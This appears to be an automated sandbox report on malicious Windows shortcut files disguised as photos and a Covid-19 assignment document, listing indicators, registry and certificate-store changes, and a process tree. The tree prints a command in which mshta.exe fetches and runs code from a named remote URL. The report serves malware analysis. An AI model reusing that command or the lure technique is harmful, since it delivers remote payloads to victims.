Overview
overview
10Static
static
samples/As...cx.lnk
windows7_x64
10samples/As...cx.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/Im...pg.lnk
windows7_x64
10samples/Im...pg.lnk
windows10-2004_x64
10Analysis
-
max time kernel
301s -
max time network
1218s -
platform
windows7_x64 -
resource
win7-20220311-en -
submitted
22-03-2022 12:37
Static task
static1
Behavioral task
behavioral1
Sample
samples/Assignment-Covid-19.docx.lnk
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
samples/Assignment-Covid-19.docx.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral3
Sample
samples/IMG20100510171450.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral4
Sample
samples/IMG20100510171450.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral5
Sample
samples/IMG20100510223001.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral6
Sample
samples/IMG20100510223001.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral7
Sample
samples/IMG20201210342791.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral8
Sample
samples/IMG20201210342791.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral9
Sample
samples/IMG20210588270623.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral10
Sample
samples/IMG20210588270623.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral11
Sample
samples/IMG20210713121548.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral12
Sample
samples/IMG20210713121548.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral13
Sample
samples/IMG20210743209813.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral14
Sample
samples/IMG20210743209813.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral15
Sample
samples/IMG20210911131002.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral16
Sample
samples/IMG20210911131002.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral17
Sample
samples/IMG20210918232755.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral18
Sample
samples/IMG20210918232755.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral19
Sample
samples/IMG_20201220_211940.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral20
Sample
samples/IMG_20201220_211940.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral21
Sample
samples/IMG_20210111_125841.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral22
Sample
samples/IMG_20210111_125841.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral23
Sample
samples/IMG_20210603_122317.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral24
Sample
samples/IMG_20210603_122317.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral25
Sample
samples/IMG_20210603_122331.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral26
Sample
samples/IMG_20210603_122331.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral27
Sample
samples/IMG_20210628_105339.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral28
Sample
samples/IMG_20210628_105339.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral29
Sample
samples/IMG_20210628_160548.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral30
Sample
samples/IMG_20210628_160548.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral31
Sample
samples/Image-8646-ZP.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral32
Sample
samples/Image-8646-ZP.jpg.lnk
Resource
win10v2004-en-20220113
General
-
Target
samples/Assignment-Covid-19.docx.lnk
Malware Config
Extracted
https://www.inapharma.in/css/files/docs/Assignment-Covid-19/css
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 5 636 mshta.exe 7 636 mshta.exe 9 636 mshta.exe 11 636 mshta.exe 13 636 mshta.exe 14 636 mshta.exe 15 636 mshta.exe 16 636 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1824 wrote to memory of 636 1824 cmd.exe 28 PID 1824 wrote to memory of 636 1824 cmd.exe 28 PID 1824 wrote to memory of 636 1824 cmd.exe 28
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\samples\Assignment-Covid-19.docx.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://www.inapharma.in/css/files/docs/Assignment-Covid-19/css2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
PID:636
-